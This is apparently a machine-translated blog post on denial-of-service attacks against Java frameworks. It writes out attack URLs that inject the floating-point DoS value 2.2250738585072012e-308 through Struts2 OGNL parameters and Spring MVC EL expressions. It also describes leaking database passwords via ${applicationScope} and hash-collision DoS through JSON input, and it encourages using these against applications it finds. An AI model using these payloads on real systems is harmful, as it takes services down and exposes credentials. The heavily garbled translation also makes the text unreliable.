Struts2 framework DoS Vulnerability

Struts2 DOS Vulnerability rain track: this is the original 0-day, the old 0-Day, which has been fixed in the new version.

The principle is like this: http://wwwxxx.net/app/secTest.action? New

Java. lang. double (2.225074255072012e-308). During processing, the framework is automatically converted to the Double type. In theory, the parameter name must have a horizontal line, so it is processed by struts2 parameters, intercepted. So I tried to bypass it. Although this URL is long and long, it does not appear on a horizontal line, so it is accepted. Http://www.inbreak.net/app/secTest.action? (New java. lang. Double (0.000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000022250738585072012 ))
This is actually to replace the scientific notation of that value with the normal decimal notation.
This is an old vulnerability. If you encounter an application that can be played by this old exp, do not hesitate to change to the latest struts2.
Execute exp remotely, which is even more powerful.

Spring mvc dos
When spring mvc also has dos, in earlier versions, spring mvc experienced an information leakage vulnerability. During attacks, the information in the application is displayed as long as the parameter value is $ {applicationScope, this is a sensitive area. Attackers can directly obtain the database connection pool, which contains the Database Password. Most applications store the password here. However, there are also a lot of applications, even if the Database Password is obtained, it does not help the attack. So we were so angry. Go to DOS.
Let's talk about the principle. This shows the information in the application because EL expression injection is generated here. EL expression is a simple language that is not very useful for attacks, but it has basic type conversion functions. Therefore, we can:

Http: // localhost: 8080/index.htm? Message =$ {0.0000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000022250738585072012} the value of this MESSAGE will be processed by the EL expression. If you see this type, it is automatically converted to the Double type.
To trigger the "java Floating Point Vulnerability" mentioned above ". This is a new usage. I call it 0-day-level usage.
Method.

 

Evil java hash dos Attacks
The content in this section has contributed to wooyun's article, so I decided to hide it. However, it is the cause of the vulnerability, so
It must be briefly mentioned. Some time ago, there was a very fierce attack. "java hash collision Denial of Service" is the cross-language, cross-level
Server, cross-web Container, countless applications are under the same attack. In that article, we mentioned "json object denial of service", which can be used to attack all json objects. The principle is that they are all stored using hash map. A Json object allows an application to receive a string and convert it to a JSON object. For example:
{"Aaaaa": "bbbbb", "ccccc", and "ddddd"}, because json objects are stored by hash map, once a web application receives USER Parameters and converts them to json, attackers can submit the custom JSON to the web application to generate DOS attacks.

When this data packet is submitted, the web application can fill the cpu. But in fact, this attack is still limited. Not all applications will implement this function. Therefore, if the framework will automatically do this, you can see one to kill.